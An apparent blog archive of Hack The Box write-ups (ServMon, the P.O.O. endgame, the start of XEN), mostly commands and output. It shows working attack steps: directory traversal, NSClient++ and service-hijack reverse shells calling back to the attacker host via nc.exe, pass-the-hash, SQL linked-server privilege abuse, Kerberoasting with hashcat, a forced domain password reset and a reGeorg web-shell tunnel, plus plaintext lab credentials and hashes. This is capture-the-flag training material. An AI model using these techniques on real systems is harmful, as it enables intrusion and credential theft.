Month: April 2020
htb-servmon
As always we start with an nmap scan. FTP allows anonymous login, and in ftp://10.10.10.184/Nathan we find confidential.txt:
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
The web application is vulnerable to directory traversal (LFI), https://www.exploit-db.com/exploits/47774, which lets us read C:\Users\Nathan\Desktop\Passwords.txt.
So we have a list of candidate passwords. Trying them against SSH, L1k3B1gBut7s@W0rk turns out to be the password for the user Nadine:
ssh nadine@10.10.10.184 (password L1k3B1gBut7s@W0rk)
Next we upload nc.exe to the box (c:\temp\nc.exe).
For privilege escalation we use the NSClient++ local privilege escalation, https://www.exploit-db.com/exploits/46802. A local user can read the NSClient++ web admin password:

C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

This is the password for the NSClient++ web interface on port 8443. The API is called on localhost below, so run this on the box itself or through an SSH port forward (ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184). With the password we can write a script into the external scripts directory through the REST API:

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat --data-binary "c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe"

Triggering the uploaded script through the API (the exploit-db entry covers that step) runs it as SYSTEM and connects back to our listener on port 443.
Or, with the Administrator NT hash, pass-the-hash with Impacket psexec:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of c:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
15/04/2020  05:58                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65
c:\Temp>cqh -samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Note that this dump is not usable: every account shows aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0, which is the LM/NT hash pair of an empty password, and the Administrator hash that worked with psexec above is different. The tool evidently did not get the real SAM data, so a dump like this should be redone (for example from the SAM and SYSTEM hives, or with secretsdump) before any of the hashes are trusted.
Another way:
Enumerating the current user shows membership of the "Server Operators" group, which can read and write service configuration, including services that run as SYSTEM, and can start them. So the idea is: find a SYSTEM service that is not running, point its ImagePath at nc.exe (or another payload), and start it. Expect sc.exe to report that the service did not respond (error 1053), since nc.exe is not a real service binary; the connection back to the listener arrives anyway, but the process may be killed once the service control manager gives up on it, so do not rely on that shell living long.
*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.
*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>
Author : Puckiestyle
htb-endgame-poo
Hack the Box – P.O.O (writeup published once the endgame retired, June 2020)
As usual I add the IP of the machine, 10.13.38.11, to /etc/hosts as poo.htb.
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11
The scan shows only a few open ports: HTTP on 80 and MSSQL on 1433. I chose not to perform a UDP scan at this point in the exercise.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn't come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ
wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
The interesting results were the 'admin' folder and the '.DS_Store' file: admin indicates an area of privilege, and .DS_Store is the macOS Finder metadata file, which among other things records the names of the entries in the directory it lives in, so one left behind in a web root leaks file and folder names.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.
I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.
Reading Directories
Knowing that .DS_Store files contain the directory listing, I parsed the file with https://github.com/lijiejie/ds_store_exp:
python ds_store_exp.py http://10.13.38.11/.DS_Store
That revealed some interesting directories. I then ran the IIS Shortname Scanner from https://github.com/irsdl/IIS-ShortName-Scanner against them, and one directory in particular came back with good information:
java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
The scanner abuses IIS's handling of 8.3 short names (names of the form XXXXXX~1.EXT), so it only reveals the first six characters of a file name and the first three of its extension; the rest has to be guessed. I tried a couple of filenames and then hit the jackpot with poo_connection.txt.
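To cut down the guessing after a short-name hit, here is an added example (not from the writeup or from the scanner project) that applies the Windows 8.3 short-name rules to a wordlist and keeps only the names that would collapse to the observed short name. The wordlist is constructed; POO_CO~1.TXT is the short name that poo_connection.txt produces.

```python
import re

# Legal in a long name but not in an 8.3 name; NTFS replaces these with '_' in the alias.
ILLEGAL_83 = set("+,;=[]")


def _split(long_name):
    name = long_name.strip().upper()
    return name.rsplit(".", 1) if "." in name else (name, "")


def _clean(part):
    # Spaces and extra dots are dropped, illegal characters become '_'.
    return "".join("_" if ch in ILLEGAL_83 else ch for ch in part if ch not in " .")


def fits_83(long_name):
    """Names that already fit 8.3 get no tilde alias, so the scanner reports them in full."""
    stem, ext = _split(long_name)
    ok = lambda s, n: 0 < len(s) <= n and _clean(s) == s
    return ok(stem, 8) and (ext == "" or ok(ext, 3))


def tilde_alias(long_name, n=1):
    """8.3 alias as Windows builds it for the first few collisions (~1 to ~4)."""
    if fits_83(long_name):
        return long_name.strip().upper()
    stem, ext = (_clean(p) for p in _split(long_name))
    alias = f"{stem[:6]}~{n}"
    return f"{alias}.{ext[:3]}" if ext else alias


def matches_hit(long_name, observed):
    """Would long_name collapse to the short name the scanner reported? The ~N index is
    ignored: it depends on creation order on the server, not on the name itself."""
    m = re.fullmatch(r"([^~.]{1,6})~\d+(?:\.([^.]{0,3}))?", observed.strip().upper())
    if not m:
        raise ValueError("expected a tilde short name such as POO_CO~1.TXT")
    if fits_83(long_name):
        return False
    stem, ext = (_clean(p) for p in _split(long_name))
    return stem[:6] == m[1] and ext[:3] == (m[2] or "")


def filter_wordlist(words, observed):
    return [w for w in words if matches_hit(w, observed)]


# Constructed wordlist; poo_connection.txt is the file the writeup found.
WORDLIST = ["poo_connection.txt", "poo_conn.txt", "poo_config.txt", "pooconnection.txt",
            "readme.txt", "poo_connection.txt.bak", "poo-connection.txt"]

if __name__ == "__main__":
    print(tilde_alias("poo_connection.txt"))          # POO_CO~1.TXT
    print(filter_wordlist(WORDLIST, "POO_CO~1.TXT"))  # ['poo_connection.txt', 'poo_config.txt']
```

Two things the filter makes visible: poo_conn.txt already fits 8.3, so it never gets a tilde alias and is correctly dropped, while poo_config.txt produces the same six-character prefix as poo_connection.txt, so the scanner hit alone cannot tell them apart and each survivor still has to be requested. After four collisions on the same prefix Windows switches to a hashed alias (two characters plus four hex digits), which this does not model.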
This looked like connection details for a SQL database, and it contains our first flag.

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}
SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.
And we have a successful login.
I then proceeded to create a new user puckie for myself.
Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag
SELECT * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}
Creating the SQL user puckie in SQL Management Studio: external_user is not sysadmin on POO_PUBLIC (the mssql_enum output in the extra section below lists only sa), but POO_CONFIG is a linked server, and from POO_CONFIG there is a link back to POO_PUBLIC that runs under a more privileged login. The first three statements check who we are on each hop and which links exist, the fourth checks which login the hop back in lands as, and the nested EXEC ... AT lets the last two statements run under that login:

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
SHELL Access
I needed to enable xp_cmdshell (via sp_configure; Impacket's mssqlclient.py, shown in the extra section below, has an enable_xp_cmdshell helper for this).
Now that I had sysadmin rights on the instance, I used https://alamot.github.io/mssql_shell/ to get a shell on the box:
python3 mssql_shell.py (copy at https://github.com/puckiestyle/python/blob/master/mssql_shell.py)
I was unable to read the web.config file this way: xp_cmdshell runs as the SQL Server service account, and trying to type the file out gave Access Denied.
After a little looking around on the system, I noticed that Python is installed, which means Machine Learning Services (sp_execute_external_script) is available. External scripts are run by the Launchpad service under separate local worker accounts, so they are subject to different file permissions than xp_cmdshell:

xp_cmdshell whoami
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';
Admin Page
Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.
POO{4882bd2ccfd4b5318978540d9843729f}
IPv6 and WinRM
I tried everything to get a reverse shell from the box, but the firewall seemed to block all outbound traffic. Among the rules is the outbound block that SQL Server's Machine Learning Services installs for its worker accounts, which is why the Python external scripts could not call out either:
netsh advfirewall firewall show rule name="Block network access for R local user accounts in SQL Server instance POO_PUBLIC"
And then I noticed an IPv6 address and another adapter.
I performed an additional scan on the IPv6 address.
kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds
I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.
dead:babe::1001 poov6.htb
I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.
ruby winrm_shell_with_upload.rb
Or use Evil-winrm to find the 4th flag
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}
I wanted to see what I could find out about the domain. Since the host is domain-joined, I hoped to request service tickets for accounts with an SPN (Kerberoasting) and crack them offline. For that I would use the MSSQL access I had created earlier.
Kerberoasting
I logged back in through the SQL Shell that I had earlier.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
This came back with two accounts: p00_hr and p00_adm.
I copied the two hashes to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack them.
Hashcat
I ran both hashes through hashcat with rockyou and the best64 rule (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC tickets):

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly:
p00_hr:Password123!
The p00_adm hash did not crack with rockyou, so I ran it against every password list in the SecLists folder:

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

This eventually found a result from Keyboard-Combinations.txt:
p00_adm:ZQ!5t4r
With both passwords cracked, I needed to get access to the domain controller, which was on 172.20.128.53.
Domain details
I uploaded PowerView.ps1 to the temp folder and imported it into PowerShell:
Import-Module .\PowerView.ps1
With a credential object for p00_adm set up, I queried the users on the domain:
get-netuser -DomainController dc -Credential $cred
Looking through the list of domain users, one stood out: an account named mr3ks.
PowerView / Domain Password
The PowerView version I was using was a bit awkward, so I switched to the one at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1, which also has Set-DomainUserPassword. I did not yet know whether p00_adm had the right to reset another user's password (this only works if the caller holds a reset-password right such as User-Force-Change-Password or GenericAll over the target), but it was worth a try:

UPLOAD /opt/htb/endgame/poo/sdup.ps1 c:\temp\sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I got no error, so the password change had presumably succeeded (mr3ks now has the same password, ZQ!5t4r). Connecting with it over PowerShell remoting, however, did not work.
reGeorg
I was now forced to set up a tunnel to reach WinRM on the domain controller. I uploaded the reGeorg aspx tunnel into the web root:
UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx
I then browsed to the tunnel to see if it would activate. To my surprise, it worked. Now to create the SOCKS tunnel with reGeorg:
python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx
I knew the IP of the domain controller from earlier, so I pointed the WinRM script at it with the mr3ks username and password and ran it through the SOCKS proxy with proxychains:
proxychains ruby winrmdc_shell_with_upload.rb
This gave me direct access to the domain controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}
This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, check the operating system version; in this case it was Windows Server 2019 (build 17763, as the mssql_enum output below also shows):
(get-wmiobject win32_operatingsystem).name
If so, and you have admin rights as we did here, you can install the ASP.NET feature so that aspx executes. In a shell, simply type:
dism /online /enable-feature /featurename:NetFx4Extended-ASPNET45 /All
Extra
kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL> help
     lcd {path}            - changes the current local directory to {path}
     exit                  - terminates the server process (and this session)
     enable_xp_cmdshell    - you know what it means
     disable_xp_cmdshell   - you know what it means
     xp_cmdshell {cmd}     - executes cmd using xp_cmdshell
     sp_start_job {cmd}    - executes cmd using the sql server agent (blind)
     ! {cmd}               - executes a local shell cmd
SQL>
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run

[*] Running module against 10.13.38.11
[*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user...
[+] 10.13.38.11:1433 - Connected.
[*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY
[*] 10.13.38.11:1433 - Domain Name: POO
[+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.13.38.11:1433 -  - POO\Administrator
[*] 10.13.38.11:1433 -  - POO\Guest
[*] 10.13.38.11:1433 -  - POO\krbtgt
[*] 10.13.38.11:1433 -  - POO\DefaultAccount
[*] 10.13.38.11:1433 -  - POO\Domain Admins
[*] 10.13.38.11:1433 -  - POO\Domain Users
[*] 10.13.38.11:1433 -  - POO\Domain Guests
[*] 10.13.38.11:1433 -  - POO\Domain Computers
[*] 10.13.38.11:1433 -  - POO\Domain Controllers
[*] 10.13.38.11:1433 -  - POO\Cert Publishers
[*] 10.13.38.11:1433 -  - POO\Schema Admins
[*] 10.13.38.11:1433 -  - POO\Enterprise Admins
[*] 10.13.38.11:1433 -  - POO\Group Policy Creator Owners
[*] 10.13.38.11:1433 -  - POO\Read-only Domain Controllers
[*] 10.13.38.11:1433 -  - POO\Cloneable Domain Controllers
[*] 10.13.38.11:1433 -  - POO\Protected Users
[*] 10.13.38.11:1433 -  - POO\Key Admins
[*] 10.13.38.11:1433 -  - POO\Enterprise Key Admins
[*] 10.13.38.11:1433 -  - POO\RAS and IAS Servers
[*] 10.13.38.11:1433 -  - POO\Allowed RODC Password Replication Group
[*] 10.13.38.11:1433 -  - POO\Denied RODC Password Replication Group
[*] 10.13.38.11:1433 -  - POO\mr3ks
[*] 10.13.38.11:1433 -  - POO\DC$
[*] 10.13.38.11:1433 -  - POO\DnsAdmins
[*] 10.13.38.11:1433 -  - POO\DnsUpdateProxy
[*] 10.13.38.11:1433 -  - POO\COMPATIBILITY$
[*] 10.13.38.11:1433 -  - POO\p00_hr
[*] 10.13.38.11:1433 -  - POO\p00_dev
[*] 10.13.38.11:1433 -  - POO\p00_adm
[*] 10.13.38.11:1433 -  - POO\P00 Help Desk
[+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11
rhosts => 10.13.38.11
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run

[*] Running module against 10.13.38.11
[*] 10.13.38.11:1433 - Running MS SQL Server Enumeration...
[*] 10.13.38.11:1433 - Version:
[*]     Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64)
[*]     Jun 15 2019 00:26:19
[*]     Copyright (C) 2017 Microsoft Corporation
[*]     Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.13.38.11:1433 - Configuration Parameters:
[*] 10.13.38.11:1433 -     C2 Audit Mode is Not Enabled
[*] 10.13.38.11:1433 -     xp_cmdshell is Enabled
[*] 10.13.38.11:1433 -     remote access is Enabled
[*] 10.13.38.11:1433 -     allow updates is Not Enabled
[*] 10.13.38.11:1433 -     Database Mail XPs is Not Enabled
[*] 10.13.38.11:1433 -     Ole Automation Procedures are Not Enabled
[*] 10.13.38.11:1433 - Databases on the server:
[*] 10.13.38.11:1433 -     Database name:master
[*] 10.13.38.11:1433 -     Database Files for master:
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] 10.13.38.11:1433 -     Database name:tempdb
[*] 10.13.38.11:1433 -     Database Files for tempdb:
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] 10.13.38.11:1433 -     Database name:POO_PUBLIC
[*] 10.13.38.11:1433 -     Database Files for POO_PUBLIC:
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] 10.13.38.11:1433 -         C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] 10.13.38.11:1433 - System Logins on this Server:
[*] 10.13.38.11:1433 -     sa
[*] 10.13.38.11:1433 -     external_user
[*] 10.13.38.11:1433 - Disabled Accounts:
[*] 10.13.38.11:1433 -     No Disabled Logins Found
[*] 10.13.38.11:1433 - No Accounts Policy is set for:
[*] 10.13.38.11:1433 -     All System Accounts have the Windows Account Policy Applied to them.
[*] 10.13.38.11:1433 - Password Expiration is not checked for:
[*] 10.13.38.11:1433 -     sa
[*] 10.13.38.11:1433 -     external_user
[*] 10.13.38.11:1433 - System Admin Logins on this Server:
[*] 10.13.38.11:1433 -     sa
[*] 10.13.38.11:1433 - Windows Logins on this Server:
[*] 10.13.38.11:1433 -     No Windows logins found!
[*] 10.13.38.11:1433 - Windows Groups that can logins on this Server:
[*] 10.13.38.11:1433 -     No Windows Groups where found with permission to login to system.
[*] 10.13.38.11:1433 - Accounts with Username and Password being the same:
[*] 10.13.38.11:1433 -     No Account with its password being the same as its username was found.
[*] 10.13.38.11:1433 - Accounts with empty password:
[*] 10.13.38.11:1433 -     No Accounts with empty passwords where found.
[*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found:
[*] 10.13.38.11:1433 -     sp_replsetsyncstatus
[*] 10.13.38.11:1433 -     sp_replcounters
[*] 10.13.38.11:1433 -     sp_replsendtoqueue
[*] 10.13.38.11:1433 -     sp_resyncexecutesql
[*] 10.13.38.11:1433 -     sp_prepexecrpc
[*] 10.13.38.11:1433 -     sp_repltrans
[*] 10.13.38.11:1433 -     sp_xml_preparedocument
[*] 10.13.38.11:1433 -     xp_qv
[*] 10.13.38.11:1433 -     xp_getnetname
[*] 10.13.38.11:1433 -     sp_releaseschemalock
[*] 10.13.38.11:1433 -     sp_refreshview
[*] 10.13.38.11:1433 -     sp_replcmds
[*] 10.13.38.11:1433 -     sp_unprepare
[*] 10.13.38.11:1433 -     sp_resyncprepare
[*] 10.13.38.11:1433 -     sp_createorphan
[*] 10.13.38.11:1433 -     xp_dirtree
[*] 10.13.38.11:1433 -     sp_replwritetovarbin
[*] 10.13.38.11:1433 -     sp_replsetoriginator
[*] 10.13.38.11:1433 -     sp_xml_removedocument
[*] 10.13.38.11:1433 -     sp_repldone
[*] 10.13.38.11:1433 -     sp_reset_connection
[*] 10.13.38.11:1433 -     xp_fileexist
[*] 10.13.38.11:1433 -     xp_fixeddrives
[*] 10.13.38.11:1433 -     sp_getschemalock
[*] 10.13.38.11:1433 -     sp_prepexec
[*] 10.13.38.11:1433 -     xp_revokelogin
[*] 10.13.38.11:1433 -     sp_execute_external_script
[*] 10.13.38.11:1433 -     sp_resyncuniquetable
[*] 10.13.38.11:1433 -     sp_replflush
[*] 10.13.38.11:1433 -     sp_resyncexecute
[*] 10.13.38.11:1433 -     xp_grantlogin
[*] 10.13.38.11:1433 -     sp_droporphans
[*] 10.13.38.11:1433 -     xp_regread
[*] 10.13.38.11:1433 -     sp_getbindtoken
[*] 10.13.38.11:1433 -     sp_replincrementlsn
[*] 10.13.38.11:1433 - Instances found on this server:
[*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.13.38.11:1433 -     xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >
Author – Puckiestyle
htb-endgame-xen
Hack the Box – XEN (retired June 2020)
First I add the IP of the machine, 10.13.38.12, to /etc/hosts as xen.htb.
NMAP
As always we start with an nmap scan:
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
25/tcp  open  smtp
| fingerprint-strings:
|   GenericLines, GetRequest:
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     sequence of commands
|     sequence of commands
|   Hello:
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     EHLO Invalid domain address.
|   Help:
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   NULL:
|_    220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http     Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open  ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after:  2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
